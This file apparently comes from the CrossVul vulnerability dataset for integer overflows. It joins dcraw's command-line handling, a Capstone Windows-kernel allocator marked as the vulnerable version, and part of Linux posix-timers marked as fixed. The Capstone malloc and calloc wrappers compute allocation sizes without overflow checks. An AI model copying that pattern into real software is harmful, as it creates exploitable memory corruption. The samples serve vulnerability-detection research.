case 'n': threshold = atof(argv[arg++]); break;
case 'b': bright = atof(argv[arg++]); break;
case 'r':
FORC4 user_mul[c] = atof(argv[arg++]); break;
case 'C': aber[0] = 1 / atof(argv[arg++]);
aber[2] = 1 / atof(argv[arg++]); break;
case 'g': gamm[0] = atof(argv[arg++]);
gamm[1] = atof(argv[arg++]);
if (gamm[0]) gamm[0] = 1/gamm[0]; break;
case 'k': user_black = atoi(argv[arg++]); break;
case 'S': user_sat = atoi(argv[arg++]); break;
case 't': user_flip = atoi(argv[arg++]); break;
case 'q': user_qual = atoi(argv[arg++]); break;
case 'm': med_passes = atoi(argv[arg++]); break;
case 'H': highlight = atoi(argv[arg++]); break;
case 's':
shot_select = abs(atoi(argv[arg]));
multi_out = !strcmp(argv[arg++],"all");
break;
case 'o':
if (isdigit(argv[arg][0]) && !argv[arg][1])
output_color = atoi(argv[arg++]);
#ifndef NO_LCMS
else out_profile = argv[arg++];
break;
case 'p': cam_profile = argv[arg++];
#endif
break;
case 'P': bpfile = argv[arg++]; break;
case 'K': dark_frame = argv[arg++]; break;
case 'z': timestamp_only = 1; break;
case 'e': thumbnail_only = 1; break;
case 'i': identify_only = 1; break;
case 'c': write_to_stdout = 1; break;
case 'v': verbose = 1; break;
case 'h': half_size = 1; break;
case 'f': four_color_rgb = 1; break;
case 'A': FORC4 greybox[c] = atoi(argv[arg++]);
case 'a': use_auto_wb = 1; break;
case 'w': use_camera_wb = 1; break;
case 'M': use_camera_matrix = 3 * (opm == '+'); break;
case 'I': read_from_stdin = 1; break;
case 'E': document_mode++;
case 'D': document_mode++;
case 'd': document_mode++;
case 'j': use_fuji_rotate = 0; break;
case 'W': no_auto_bright = 1; break;
case 'T': output_tiff = 1; break;
case '4': gamm[0] = gamm[1] =
no_auto_bright = 1;
case '6': output_bps = 16; break;
default:
fprintf (stderr,_("Unknown option \"-%c\".\n"), opt);
return 1;
}
}
if (arg == argc) {
fprintf (stderr,_("No files to process.\n"));
return 1;
}
if (write_to_stdout) {
if (isatty(1)) {
fprintf (stderr,_("Will not write an image to the terminal!\n"));
return 1;
}
#if defined(WIN32) || defined(DJGPP) || defined(__CYGWIN__)
if (setmode(1,O_BINARY) < 0) {
perror ("setmode()");
return 1;
}
#endif
}
for ( ; arg < argc; arg++) {
status = 1;
raw_image = 0;
image = 0;
oprof = 0;
meta_data = ofname = 0;
ofp = stdout;
if (setjmp (failure)) {
if (fileno(ifp) > 2) fclose(ifp);
if (fileno(ofp) > 2) fclose(ofp);
status = 1;
goto cleanup;
}
ifname = argv[arg];
if (!(ifp = fopen (ifname, "rb"))) {
perror (ifname);
continue;
}
status = (identify(),!is_raw);
if (user_flip >= 0)
flip = user_flip;
switch ((flip+3600) % 360) {
case 270: flip = 5; break;
case 180: flip = 3; break;
case 90: flip = 6;
}
if (timestamp_only) {
if ((status = !timestamp))
fprintf (stderr,_("%s has no timestamp.\n"), ifname);
else if (identify_only)
printf ("%10ld%10d %s\n", (long) timestamp, shot_order, ifname);
else {
if (verbose)
fprintf (stderr,_("%s time set to %d.\n"), ifname, (int) timestamp);
ut.actime = ut.modtime = timestamp;
utime (ifname, &ut);
}
goto next;
}
write_fun = &CLASS write_ppm_tiff;
if (thumbnail_only) {
if ((status = !thumb_offset)) {
fprintf (stderr,_("%s has no thumbnail.\n"), ifname);
goto next;
} else if (thumb_load_raw) {
load_raw = thumb_load_raw;
data_offset = thumb_offset;
height = thumb_height;
width = thumb_width;
filters = 0;
colors = 3;
} else {
fseek (ifp, thumb_offset, SEEK_SET);
write_fun = write_thumb;
goto thumbnail;
}
}
if (load_raw == &CLASS kodak_ycbcr_load_raw) {
height += height & 1;
width += width & 1;
}
if (identify_only && verbose && make[0]) {
printf (_("\nFilename: %s\n"), ifname);
printf (_("Timestamp: %s"), ctime(×tamp));
printf (_("Camera: %s %s\n"), make, model);
if (artist[0])
printf (_("Owner: %s\n"), artist);
if (dng_version) {
printf (_("DNG Version: "));
for (i=24; i >= 0; i -= 8)
printf ("%d%c", dng_version >> i & 255, i ? '.':'\n');
}
printf (_("ISO speed: %d\n"), (int) iso_speed);
printf (_("Shutter: "));
if (shutter > 0 && shutter < 1)
shutter = (printf ("1/"), 1 / shutter);
printf (_("%0.1f sec\n"), shutter);
printf (_("Aperture: f/%0.1f\n"), aperture);
printf (_("Focal length: %0.1f mm\n"), focal_len);
printf (_("Embedded ICC profile: %s\n"), profile_length ? _("yes"):_("no"));
printf (_("Number of raw images: %d\n"), is_raw);
if (pixel_aspect != 1)
printf (_("Pixel Aspect Ratio: %0.6f\n"), pixel_aspect);
if (thumb_offset)
printf (_("Thumb size: %4d x %d\n"), thumb_width, thumb_height);
printf (_("Full size: %4d x %d\n"), raw_width, raw_height);
} else if (!is_raw)
fprintf (stderr,_("Cannot decode file %s\n"), ifname);
if (!is_raw) goto next;
shrink = filters && (half_size || (!identify_only &&
(threshold || aber[0] != 1 || aber[2] != 1)));
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (identify_only) {
if (verbose) {
if (document_mode == 3) {
top_margin = left_margin = fuji_width = 0;
height = raw_height;
width = raw_width;
}
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (use_fuji_rotate) {
if (fuji_width) {
fuji_width = (fuji_width - 1 + shrink) >> shrink;
iwidth = fuji_width / sqrt(0.5);
iheight = (iheight - fuji_width) / sqrt(0.5);
} else {
if (pixel_aspect < 1) iheight = iheight / pixel_aspect + 0.5;
if (pixel_aspect > 1) iwidth = iwidth * pixel_aspect + 0.5;
}
}
if (flip & 4)
SWAP(iheight,iwidth);
printf (_("Image size: %4d x %d\n"), width, height);
printf (_("Output size: %4d x %d\n"), iwidth, iheight);
printf (_("Raw colors: %d"), colors);
if (filters) {
int fhigh = 2, fwide = 2;
if ((filters ^ (filters >> 8)) & 0xff) fhigh = 4;
if ((filters ^ (filters >> 16)) & 0xffff) fhigh = 8;
if (filters == 1) fhigh = fwide = 16;
if (filters == 9) fhigh = fwide = 6;
printf (_("\nFilter pattern: "));
for (i=0; i < fhigh; i++)
for (c = i && putchar('/') && 0; c < fwide; c++)
putchar (cdesc[fcol(i,c)]);
}
printf (_("\nDaylight multipliers:"));
FORCC printf (" %f", pre_mul[c]);
if (cam_mul[0] > 0) {
printf (_("\nCamera multipliers:"));
FORC4 printf (" %f", cam_mul[c]);
}
putchar ('\n');
} else
printf (_("%s is a %s %s image.\n"), ifname, make, model);
next:
fclose(ifp);
continue;
}
if (meta_length) {
meta_data = (char *) malloc (meta_length);
merror (meta_data, "main()");
}
if (filters || colors == 1) {
raw_image = (ushort *) calloc ((raw_height+7), raw_width*2);
merror (raw_image, "main()");
} else {
image = (ushort (*)[4]) calloc (iheight, iwidth*sizeof *image);
merror (image, "main()");
}
if (verbose)
fprintf (stderr,_("Loading %s %s image from %s ...\n"),
make, model, ifname);
if (shot_select >= is_raw)
fprintf (stderr,_("%s: \"-s %d\" requests a nonexistent image!\n"),
ifname, shot_select);
fseeko (ifp, data_offset, SEEK_SET);
if (raw_image && read_from_stdin)
fread (raw_image, 2, raw_height*raw_width, stdin);
else (*load_raw)();
if (document_mode == 3) {
top_margin = left_margin = fuji_width = 0;
height = raw_height;
width = raw_width;
}
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (raw_image) {
image = (ushort (*)[4]) calloc (iheight, iwidth*sizeof *image);
merror (image, "main()");
crop_masked_pixels();
free (raw_image);
}
if (zero_is_bad) remove_zeroes();
bad_pixels (bpfile);
if (dark_frame) subtract (dark_frame);
quality = 2 + !fuji_width;
if (user_qual >= 0) quality = user_qual;
i = cblack[3];
FORC3 if (i > cblack[c]) i = cblack[c];
FORC4 cblack[c] -= i;
black += i;
i = cblack[6];
FORC (cblack[4] * cblack[5])
if (i > cblack[6+c]) i = cblack[6+c];
FORC (cblack[4] * cblack[5])
cblack[6+c] -= i;
black += i;
if (user_black >= 0) black = user_black;
FORC4 cblack[c] += black;
if (user_sat > 0) maximum = user_sat;
#ifdef COLORCHECK
colorcheck();
#endif
if (is_foveon) {
if (document_mode || load_raw == &CLASS foveon_dp_load_raw) {
for (i=0; i < height*width*4; i++)
if ((short) image[0][i] < 0) image[0][i] = 0;
} else foveon_interpolate();
} else if (document_mode < 2)
scale_colors();
pre_interpolate();
if (filters && !document_mode) {
if (quality == 0)
lin_interpolate();
else if (quality == 1 || colors > 3)
vng_interpolate();
else if (quality == 2 && filters > 1000)
ppg_interpolate();
else if (filters == 9)
xtrans_interpolate (quality*2-3);
else
ahd_interpolate();
}
if (mix_green)
for (colors=3, i=0; i < height*width; i++)
image[i][1] = (image[i][1] + image[i][3]) >> 1;
if (!is_foveon && colors == 3) median_filter();
if (!is_foveon && highlight == 2) blend_highlights();
if (!is_foveon && highlight > 2) recover_highlights();
if (use_fuji_rotate) fuji_rotate();
#ifndef NO_LCMS
if (cam_profile) apply_profile (cam_profile, out_profile);
#endif
convert_to_rgb();
if (use_fuji_rotate) stretch();
thumbnail:
if (write_fun == &CLASS jpeg_thumb)
write_ext = ".jpg";
else if (output_tiff && write_fun == &CLASS write_ppm_tiff)
write_ext = ".tiff";
else
write_ext = ".pgm\0.ppm\0.ppm\0.pam" + colors*5-5;
ofname = (char *) malloc (strlen(ifname) + 64);
merror (ofname, "main()");
if (write_to_stdout)
strcpy (ofname,_("standard output"));
else {
strcpy (ofname, ifname);
if ((cp = strrchr (ofname, '.'))) *cp = 0;
if (multi_out)
sprintf (ofname+strlen(ofname), "_%0*d",
snprintf(0,0,"%d",is_raw-1), shot_select);
if (thumbnail_only)
strcat (ofname, ".thumb");
strcat (ofname, write_ext);
ofp = fopen (ofname, "wb");
if (!ofp) {
status = 1;
perror (ofname);
goto cleanup;
}
}
if (verbose)
fprintf (stderr,_("Writing data to %s ...\n"), ofname);
(*write_fun)();
fclose(ifp);
if (ofp != stdout) fclose(ofp);
cleanup:
if (meta_data) free (meta_data);
if (ofname) free (ofname);
if (oprof) free (oprof);
if (image) free (image);
if (multi_out) {
if (++shot_select < is_raw) arg--;
else shot_select = 0;
}
}
return status;
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_582_0 |
crossvul-cpp_data_bad_3237_0 | /* Capstone Disassembly Engine */
/* By Satoshi Tanda <tanda.sat@gmail.com>, 2016 */
#include "winkernel_mm.h"
#include <ntddk.h>
// A pool tag for memory allocation
static const ULONG CS_WINKERNEL_POOL_TAG = 'kwsC';
// A structure to implement realloc()
typedef struct _CS_WINKERNEL_MEMBLOCK {
size_t size; // A number of bytes allocated
char data[1]; // An address returned to a caller
} CS_WINKERNEL_MEMBLOCK;
C_ASSERT(sizeof(CS_WINKERNEL_MEMBLOCK) == sizeof(void *) * 2);
// free()
void CAPSTONE_API cs_winkernel_free(void *ptr)
{
if (ptr) {
ExFreePoolWithTag(CONTAINING_RECORD(ptr, CS_WINKERNEL_MEMBLOCK, data), CS_WINKERNEL_POOL_TAG);
}
}
// malloc()
void * CAPSTONE_API cs_winkernel_malloc(size_t size)
{
// Disallow zero length allocation because they waste pool header space and,
// in many cases, indicate a potential validation issue in the calling code.
NT_ASSERT(size);
// FP; a use of NonPagedPool is required for Windows 7 support
#pragma prefast(suppress : 30030) // Allocating executable POOL_TYPE memory
CS_WINKERNEL_MEMBLOCK *block = (CS_WINKERNEL_MEMBLOCK *)ExAllocatePoolWithTag(
NonPagedPool, size + sizeof(CS_WINKERNEL_MEMBLOCK), CS_WINKERNEL_POOL_TAG);
if (!block) {
return NULL;
}
block->size = size;
return block->data;
}
// calloc()
void * CAPSTONE_API cs_winkernel_calloc(size_t n, size_t size)
{
size_t total = n * size;
void *new_ptr = cs_winkernel_malloc(total);
if (!new_ptr) {
return NULL;
}
return RtlFillMemory(new_ptr, total, 0);
}
// realloc()
void * CAPSTONE_API cs_winkernel_realloc(void *ptr, size_t size)
{
void *new_ptr = NULL;
size_t current_size = 0;
size_t smaller_size = 0;
if (!ptr) {
return cs_winkernel_malloc(size);
}
new_ptr = cs_winkernel_malloc(size);
if (!new_ptr) {
return NULL;
}
current_size = CONTAINING_RECORD(ptr, CS_WINKERNEL_MEMBLOCK, data)->size;
smaller_size = (current_size < size) ? current_size : size;
RtlCopyMemory(new_ptr, ptr, smaller_size);
cs_winkernel_free(ptr);
return new_ptr;
}
// vsnprintf(). _vsnprintf() is available for drivers, but it differs from
// vsnprintf() in a return value and when a null-terminator is set.
// cs_winkernel_vsnprintf() takes care of those differences.
#pragma warning(push)
// Banned API Usage : _vsnprintf is a Banned API as listed in dontuse.h for
// security purposes.
#pragma warning(disable : 28719)
int CAPSTONE_API cs_winkernel_vsnprintf(char *buffer, size_t count, const char *format, va_list argptr)
{
int result = _vsnprintf(buffer, count, format, argptr);
// _vsnprintf() returns -1 when a string is truncated, and returns "count"
// when an entire string is stored but without '\0' at the end of "buffer".
// In both cases, null-terminator needs to be added manually.
if (result == -1 || (size_t)result == count) {
buffer[count - 1] = '\0';
}
if (result == -1) {
// In case when -1 is returned, the function has to get and return a number
// of characters that would have been written. This attempts so by retrying
// the same conversion with temp buffer that is most likely big enough to
// complete formatting and get a number of characters that would have been
// written.
char* tmp = cs_winkernel_malloc(0x1000);
if (!tmp) {
return result;
}
result = _vsnprintf(tmp, 0x1000, format, argptr);
NT_ASSERT(result != -1);
cs_winkernel_free(tmp);
}
return result;
}
#pragma warning(pop)
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3237_0 |
crossvul-cpp_data_good_207_2 | /*
* linux/kernel/posix-timers.c
*
*
* 2002-10-15 Posix Clocks & timers
* by George Anzinger george@mvista.com
*
* Copyright (C) 2002 2003 by MontaVista Software.
*
* 2004-06-01 Fix CLOCK_REALTIME clock/timer TIMER_ABSTIME bug.
* Copyright (C) 2004 Boris Hu
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or (at
* your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
* MontaVista Software | 1237 East Arques Avenue | Sunnyvale | CA 94085 | USA
*/
/* These are all the functions necessary to implement
* POSIX clocks & timers
*/
#include <linux/mm.h>
#include <linux/interrupt.h>
#include <linux/slab.h>
#include <linux/time.h>
#include <linux/mutex.h>
#include <linux/sched/task.h>
#include <linux/uaccess.h>
#include <linux/list.h>
#include <linux/init.h>
#include <linux/compiler.h>
#include <linux/hash.h>
#include <linux/posix-clock.h>
#include <linux/posix-timers.h>
#include <linux/syscalls.h>
#include <linux/wait.h>
#include <linux/workqueue.h>
#include <linux/export.h>
#include <linux/hashtable.h>
#include <linux/compat.h>
#include <linux/nospec.h>
#include "timekeeping.h"
#include "posix-timers.h"
/*
* Management arrays for POSIX timers. Timers are now kept in static hash table
* with 512 entries.
* Timer ids are allocated by local routine, which selects proper hash head by
* key, constructed from current->signal address and per signal struct counter.
* This keeps timer ids unique per process, but now they can intersect between
* processes.
*/
/*
* Lets keep our timers in a slab cache :-)
*/
static struct kmem_cache *posix_timers_cache;
static DEFINE_HASHTABLE(posix_timers_hashtable, 9);
static DEFINE_SPINLOCK(hash_lock);
static const struct k_clock * const posix_clocks[];
static const struct k_clock *clockid_to_kclock(const clockid_t id);
static const struct k_clock clock_realtime, clock_monotonic;
/*
* we assume that the new SIGEV_THREAD_ID shares no bits with the other
* SIGEV values. Here we put out an error if this assumption fails.
*/
#if SIGEV_THREAD_ID != (SIGEV_THREAD_ID & \
~(SIGEV_SIGNAL | SIGEV_NONE | SIGEV_THREAD))
#error "SIGEV_THREAD_ID must not share bit with other SIGEV values!"
#endif
/*
* parisc wants ENOTSUP instead of EOPNOTSUPP
*/
#ifndef ENOTSUP
# define ENANOSLEEP_NOTSUP EOPNOTSUPP
#else
# define ENANOSLEEP_NOTSUP ENOTSUP
#endif
/*
* The timer ID is turned into a timer address by idr_find().
* Verifying a valid ID consists of:
*
* a) checking that idr_find() returns other than -1.
* b) checking that the timer id matches the one in the timer itself.
* c) that the timer owner is in the callers thread group.
*/
/*
* CLOCKs: The POSIX standard calls for a couple of clocks and allows us
* to implement others. This structure defines the various
* clocks.
*
* RESOLUTION: Clock resolution is used to round up timer and interval
* times, NOT to report clock times, which are reported with as
* much resolution as the system can muster. In some cases this
* resolution may depend on the underlying clock hardware and
* may not be quantifiable until run time, and only then is the
* necessary code is written. The standard says we should say
* something about this issue in the documentation...
*
* FUNCTIONS: The CLOCKs structure defines possible functions to
* handle various clock functions.
*
* The standard POSIX timer management code assumes the
* following: 1.) The k_itimer struct (sched.h) is used for
* the timer. 2.) The list, it_lock, it_clock, it_id and
* it_pid fields are not modified by timer code.
*
* Permissions: It is assumed that the clock_settime() function defined
* for each clock will take care of permission checks. Some
* clocks may be set able by any user (i.e. local process
* clocks) others not. Currently the only set able clock we
* have is CLOCK_REALTIME and its high res counter part, both of
* which we beg off on and pass to do_sys_settimeofday().
*/
static struct k_itimer *__lock_timer(timer_t timer_id, unsigned long *flags);
#define lock_timer(tid, flags) \
({ struct k_itimer *__timr; \
__cond_lock(&__timr->it_lock, __timr = __lock_timer(tid, flags)); \
__timr; \
})
static int hash(struct signal_struct *sig, unsigned int nr)
{
return hash_32(hash32_ptr(sig) ^ nr, HASH_BITS(posix_timers_hashtable));
}
static struct k_itimer *__posix_timers_find(struct hlist_head *head,
struct signal_struct *sig,
timer_t id)
{
struct k_itimer *timer;
hlist_for_each_entry_rcu(timer, head, t_hash) {
if ((timer->it_signal == sig) && (timer->it_id == id))
return timer;
}
return NULL;
}
static struct k_itimer *posix_timer_by_id(timer_t id)
{
struct signal_struct *sig = current->signal;
struct hlist_head *head = &posix_timers_hashtable[hash(sig, id)];
return __posix_timers_find(head, sig, id);
}
static int posix_timer_add(struct k_itimer *timer)
{
struct signal_struct *sig = current->signal;
int first_free_id = sig->posix_timer_id;
struct hlist_head *head;
int ret = -ENOENT;
do {
spin_lock(&hash_lock);
head = &posix_timers_hashtable[hash(sig, sig->posix_timer_id)];
if (!__posix_timers_find(head, sig, sig->posix_timer_id)) {
hlist_add_head_rcu(&timer->t_hash, head);
ret = sig->posix_timer_id;
}
if (++sig->posix_timer_id < 0)
sig->posix_timer_id = 0;
if ((sig->posix_timer_id == first_free_id) && (ret == -ENOENT))
/* Loop over all possible ids completed */
ret = -EAGAIN;
spin_unlock(&hash_lock);
} while (ret == -ENOENT);
return ret;
}
static inline void unlock_timer(struct k_itimer *timr, unsigned long flags)
{
spin_unlock_irqrestore(&timr->it_lock, flags);
}
/* Get clock_realtime */
static int posix_clock_realtime_get(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_real_ts64(tp);
return 0;
}
/* Set clock_realtime */
static int posix_clock_realtime_set(const clockid_t which_clock,
const struct timespec64 *tp)
{
return do_sys_settimeofday64(tp, NULL);
}
static int posix_clock_realtime_adj(const clockid_t which_clock,
struct timex *t)
{
return do_adjtimex(t);
}
/*
* Get monotonic time for posix timers
*/
static int posix_ktime_get_ts(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_ts64(tp);
return 0;
}
/*
* Get monotonic-raw time for posix timers
*/
static int posix_get_monotonic_raw(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_raw_ts64(tp);
return 0;
}
static int posix_get_realtime_coarse(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_coarse_real_ts64(tp);
return 0;
}
static int posix_get_monotonic_coarse(clockid_t which_clock,
struct timespec64 *tp)
{
ktime_get_coarse_ts64(tp);
return 0;
}
static int posix_get_coarse_res(const clockid_t which_clock, struct timespec64 *tp)
{
*tp = ktime_to_timespec64(KTIME_LOW_RES);
return 0;
}
static int posix_get_boottime(const clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_boottime_ts64(tp);
return 0;
}
static int posix_get_tai(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_clocktai_ts64(tp);
return 0;
}
static int posix_get_hrtimer_res(clockid_t which_clock, struct timespec64 *tp)
{
tp->tv_sec = 0;
tp->tv_nsec = hrtimer_resolution;
return 0;
}
/*
* Initialize everything, well, just everything in Posix clocks/timers ;)
*/
static __init int init_posix_timers(void)
{
posix_timers_cache = kmem_cache_create("posix_timers_cache",
sizeof (struct k_itimer), 0, SLAB_PANIC,
NULL);
return 0;
}
__initcall(init_posix_timers);
/*
* The siginfo si_overrun field and the return value of timer_getoverrun(2)
* are of type int. Clamp the overrun value to INT_MAX
*/
static inline int timer_overrun_to_int(struct k_itimer *timr, int baseval)
{
s64 sum = timr->it_overrun_last + (s64)baseval;
return sum > (s64)INT_MAX ? INT_MAX : (int)sum;
}
static void common_hrtimer_rearm(struct k_itimer *timr)
{
struct hrtimer *timer = &timr->it.real.timer;
if (!timr->it_interval)
return;
timr->it_overrun += hrtimer_forward(timer, timer->base->get_time(),
timr->it_interval);
hrtimer_restart(timer);
}
/*
* This function is exported for use by the signal deliver code. It is
* called just prior to the info block being released and passes that
* block to us. It's function is to update the overrun entry AND to
* restart the timer. It should only be called if the timer is to be
* restarted (i.e. we have flagged this in the sys_private entry of the
* info block).
*
* To protect against the timer going away while the interrupt is queued,
* we require that the it_requeue_pending flag be set.
*/
void posixtimer_rearm(struct siginfo *info)
{
struct k_itimer *timr;
unsigned long flags;
timr = lock_timer(info->si_tid, &flags);
if (!timr)
return;
if (timr->it_requeue_pending == info->si_sys_private) {
timr->kclock->timer_rearm(timr);
timr->it_active = 1;
timr->it_overrun_last = timr->it_overrun;
timr->it_overrun = -1LL;
++timr->it_requeue_pending;
info->si_overrun = timer_overrun_to_int(timr, info->si_overrun);
}
unlock_timer(timr, flags);
}
int posix_timer_event(struct k_itimer *timr, int si_private)
{
struct task_struct *task;
int shared, ret = -1;
/*
* FIXME: if ->sigq is queued we can race with
* dequeue_signal()->posixtimer_rearm().
*
* If dequeue_signal() sees the "right" value of
* si_sys_private it calls posixtimer_rearm().
* We re-queue ->sigq and drop ->it_lock().
* posixtimer_rearm() locks the timer
* and re-schedules it while ->sigq is pending.
* Not really bad, but not that we want.
*/
timr->sigq->info.si_sys_private = si_private;
rcu_read_lock();
task = pid_task(timr->it_pid, PIDTYPE_PID);
if (task) {
shared = !(timr->it_sigev_notify & SIGEV_THREAD_ID);
ret = send_sigqueue(timr->sigq, task, shared);
}
rcu_read_unlock();
/* If we failed to send the signal the timer stops. */
return ret > 0;
}
/*
* This function gets called when a POSIX.1b interval timer expires. It
* is used as a callback from the kernel internal timer. The
* run_timer_list code ALWAYS calls with interrupts on.
* This code is for CLOCK_REALTIME* and CLOCK_MONOTONIC* timers.
*/
static enum hrtimer_restart posix_timer_fn(struct hrtimer *timer)
{
struct k_itimer *timr;
unsigned long flags;
int si_private = 0;
enum hrtimer_restart ret = HRTIMER_NORESTART;
timr = container_of(timer, struct k_itimer, it.real.timer);
spin_lock_irqsave(&timr->it_lock, flags);
timr->it_active = 0;
if (timr->it_interval != 0)
si_private = ++timr->it_requeue_pending;
if (posix_timer_event(timr, si_private)) {
/*
* signal was not sent because of sig_ignor
* we will not get a call back to restart it AND
* it should be restarted.
*/
if (timr->it_interval != 0) {
ktime_t now = hrtimer_cb_get_time(timer);
/*
* FIXME: What we really want, is to stop this
* timer completely and restart it in case the
* SIG_IGN is removed. This is a non trivial
* change which involves sighand locking
* (sigh !), which we don't want to do late in
* the release cycle.
*
* For now we just let timers with an interval
* less than a jiffie expire every jiffie to
* avoid softirq starvation in case of SIG_IGN
* and a very small interval, which would put
* the timer right back on the softirq pending
* list. By moving now ahead of time we trick
* hrtimer_forward() to expire the timer
* later, while we still maintain the overrun
* accuracy, but have some inconsistency in
* the timer_gettime() case. This is at least
* better than a starved softirq. A more
* complex fix which solves also another related
* inconsistency is already in the pipeline.
*/
#ifdef CONFIG_HIGH_RES_TIMERS
{
ktime_t kj = NSEC_PER_SEC / HZ;
if (timr->it_interval < kj)
now = ktime_add(now, kj);
}
#endif
timr->it_overrun += hrtimer_forward(timer, now,
timr->it_interval);
ret = HRTIMER_RESTART;
++timr->it_requeue_pending;
timr->it_active = 1;
}
}
unlock_timer(timr, flags);
return ret;
}
static struct pid *good_sigevent(sigevent_t * event)
{
struct task_struct *rtn = current->group_leader;
switch (event->sigev_notify) {
case SIGEV_SIGNAL | SIGEV_THREAD_ID:
rtn = find_task_by_vpid(event->sigev_notify_thread_id);
if (!rtn || !same_thread_group(rtn, current))
return NULL;
/* FALLTHRU */
case SIGEV_SIGNAL:
case SIGEV_THREAD:
if (event->sigev_signo <= 0 || event->sigev_signo > SIGRTMAX)
return NULL;
/* FALLTHRU */
case SIGEV_NONE:
return task_pid(rtn);
default:
return NULL;
}
}
static struct k_itimer * alloc_posix_timer(void)
{
struct k_itimer *tmr;
tmr = kmem_cache_zalloc(posix_timers_cache, GFP_KERNEL);
if (!tmr)
return tmr;
if (unlikely(!(tmr->sigq = sigqueue_alloc()))) {
kmem_cache_free(posix_timers_cache, tmr);
return NULL;
}
clear_siginfo(&tmr->sigq->info);
return tmr;
}
static void k_itimer_rcu_free(struct rcu_head *head)
{
struct k_itimer *tmr = container_of(head, struct k_itimer, it.rcu);
kmem_cache_free(posix_timers_cache, tmr);
}
#define IT_ID_SET 1
#define IT_ID_NOT_SET 0
static void release_posix_timer(struct k_itimer *tmr, int it_id_set)
{
if (it_id_set) {
unsigned long flags;
spin_lock_irqsave(&hash_lock, flags);
hlist_del_rcu(&tmr->t_hash);
spin_unlock_irqrestore(&hash_lock, flags);
}
put_pid(tmr->it_pid);
sigqueue_free(tmr->sigq);
call_rcu(&tmr->it.rcu, k_itimer_rcu_free);
}
static int common_timer_create(struct k_itimer *new_timer)
{
hrtimer_init(&new_timer->it.real.timer, new_timer->it_clock, 0);
return 0;
}
/* Create a POSIX.1b interval timer. */
static int do_timer_create(clockid_t which_clock, struct sigevent *event,
timer_t __user *created_timer_id)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct k_itimer *new_timer;
int error, new_timer_id;
int it_id_set = IT_ID_NOT_SET;
if (!kc)
return -EINVAL;
if (!kc->timer_create)
return -EOPNOTSUPP;
new_timer = alloc_posix_timer();
if (unlikely(!new_timer))
return -EAGAIN;
spin_lock_init(&new_timer->it_lock);
new_timer_id = posix_timer_add(new_timer);
if (new_timer_id < 0) {
error = new_timer_id;
goto out;
}
it_id_set = IT_ID_SET;
new_timer->it_id = (timer_t) new_timer_id;
new_timer->it_clock = which_clock;
new_timer->kclock = kc;
new_timer->it_overrun = -1LL;
if (event) {
rcu_read_lock();
new_timer->it_pid = get_pid(good_sigevent(event));
rcu_read_unlock();
if (!new_timer->it_pid) {
error = -EINVAL;
goto out;
}
new_timer->it_sigev_notify = event->sigev_notify;
new_timer->sigq->info.si_signo = event->sigev_signo;
new_timer->sigq->info.si_value = event->sigev_value;
} else {
new_timer->it_sigev_notify = SIGEV_SIGNAL;
new_timer->sigq->info.si_signo = SIGALRM;
memset(&new_timer->sigq->info.si_value, 0, sizeof(sigval_t));
new_timer->sigq->info.si_value.sival_int = new_timer->it_id;
new_timer->it_pid = get_pid(task_tgid(current));
}
new_timer->sigq->info.si_tid = new_timer->it_id;
new_timer->sigq->info.si_code = SI_TIMER;
if (copy_to_user(created_timer_id,
&new_timer_id, sizeof (new_timer_id))) {
error = -EFAULT;
goto out;
}
error = kc->timer_create(new_timer);
if (error)
goto out;
spin_lock_irq(¤t->sighand->siglock);
new_timer->it_signal = current->signal;
list_add(&new_timer->list, ¤t->signal->posix_timers);
spin_unlock_irq(¤t->sighand->siglock);
return 0;
/*
* In the case of the timer belonging to another task, after
* the task is unlocked, the timer is owned by the other task
* and may cease to exist at any time. Don't use or modify
* new_timer after the unlock call.
*/
out:
release_posix_timer(new_timer, it_id_set);
return error;
}
SYSCALL_DEFINE3(timer_create, const clockid_t, which_clock,
struct sigevent __user *, timer_event_spec,
timer_t __user *, created_timer_id)
{
if (timer_event_spec) {
sigevent_t event;
if (copy_from_user(&event, timer_event_spec, sizeof (event)))
return -EFAULT;
return do_timer_create(which_clock, &event, created_timer_id);
}
return do_timer_create(which_clock, NULL, created_timer_id);
}
#ifdef CONFIG_COMPAT
COMPAT_SYSCALL_DEFINE3(timer_create, clockid_t, which_clock,
struct compat_sigevent __user *, timer_event_spec,
timer_t __user *, created_timer_id)
{
if (timer_event_spec) {
sigevent_t event;
if (get_compat_sigevent(&event, timer_event_spec))
return -EFAULT;
return do_timer_create(which_clock, &event, created_timer_id);
}
return do_timer_create(which_clock, NULL, created_timer_id);
}
#endif
/*
* Locking issues: We need to protect the result of the id look up until
* we get the timer locked down so it is not deleted under us. The
* removal is done under the idr spinlock so we use that here to bridge
* the find to the timer lock. To avoid a dead lock, the timer id MUST
* be release with out holding the timer lock.
*/
static struct k_itimer *__lock_timer(timer_t timer_id, unsigned long *flags)
{
struct k_itimer *timr;
/*
* timer_t could be any type >= int and we want to make sure any
* @timer_id outside positive int range fails lookup.
*/
if ((unsigned long long)timer_id > INT_MAX)
return NULL;
rcu_read_lock();
timr = posix_timer_by_id(timer_id);
if (timr) {
spin_lock_irqsave(&timr->it_lock, *flags);
if (timr->it_signal == current->signal) {
rcu_read_unlock();
return timr;
}
spin_unlock_irqrestore(&timr->it_lock, *flags);
}
rcu_read_unlock();
return NULL;
}
static ktime_t common_hrtimer_remaining(struct k_itimer *timr, ktime_t now)
{
struct hrtimer *timer = &timr->it.real.timer;
return __hrtimer_expires_remaining_adjusted(timer, now);
}
static s64 common_hrtimer_forward(struct k_itimer *timr, ktime_t now)
{
